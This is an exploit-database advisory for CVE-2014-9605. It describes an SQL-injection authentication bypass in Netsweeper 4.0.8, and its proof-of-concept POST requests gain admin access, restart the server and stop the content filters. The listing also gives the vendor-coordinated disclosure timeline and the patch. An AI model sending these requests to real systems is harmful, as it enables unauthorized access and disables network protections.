Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin)

vendor:

Netsweeper

by:

Anastasios Monachos

7,5

CVSS

HIGH

Authentication Bypass (using two single-quotes)

CWE

Product Name: Netsweeper

Affected Version From: 4.0.8

Affected Version To: 4.0.8

Patch Exists: Yes

Related CWE: CVE-2014-9605

CPE: a:netsweeper:netsweeper

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2014

Netsweeper 4.0.8 – SQL Injection Authentication Bypass (Admin)

By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to: i) "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders); ii) "Restart" the server; iii) "Stop the filters on the server".

Mitigation:

Upgrade to latest version.

Source

Exploit-DB raw data:

+----------------------------------------------------------------+
+ Netsweeper 4.0.8 - SQL Injection Authentication Bypass (Admin) +
+----------------------------------------------------------------+
Affected Product: Netsweeper
Vendor Homepage : www.netsweeper.com/
Version 	: 4.0.8 (and probably other versions)
Discovered by  	: Anastasios Monachos (secuid0) - [anastasiosm (at) gmail (dot) com]
Patched      	: Yes
CVE		: CVE-2014-9605

+---------------------+
+ Product Description +
+---------------------+
Netsweeper is a software solution specialized in content filtering.

+----------------------+
+ Exploitation Details +
+----------------------+
By adding two single-quotes in an specific HTTP request, it forces Netsweeeper 4.0.8 (and probably other versions) to authenticate us as admin. The access gives us the ability to:
	i)   "Back Up the System" which creates a downloadable system backup tarball file (containing the whole /etc /usr and /var folders)
	ii)  "Restart" the server
	iii) "Stop the filters on the server"

Vulnerability Type: Authentication Bypass (using two single-quotes)
p0c: 	http://netsweeper/webupgrade/webupgrade.php
	POST: step=&login='&password='&show_advanced_output=                

p0c restart the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=12&login='&password='&show_advanced_output=
		
	followed by

	http://netsweeper/webupgrade/webupgrade.php HTTP/1.1
	POST: step=12&restart=yes&show_advanced_output=false

p0c stop the filters on the server:
	http://netsweeper/webupgrade/webupgrade.php
	POST: step=9&stopservices=yes&show_advanced_output=

+----------+
+ Solution +
+----------+
Upgrade to latest version.

+---------------------+
+ Disclosure Timeline +
+---------------------+
24-Nov-2014: Initial Communication
03-Dec-2014: Netsweeper responded
03-Dec-2014: Shared full details to replicate the issue
10-Dec-2014: Netsweeper fixed the issue in releases 3.1.10, 4.0.9, 4.1.2
17-Dec-2014: New releases 3.1.10, 4.0.9, 4.1.2 made available to the public
18-Dec-2014: Confirm fix
17-Jan-2015: CVE assigned CVE-2014-9605
11-Aug-2015: Public disclosure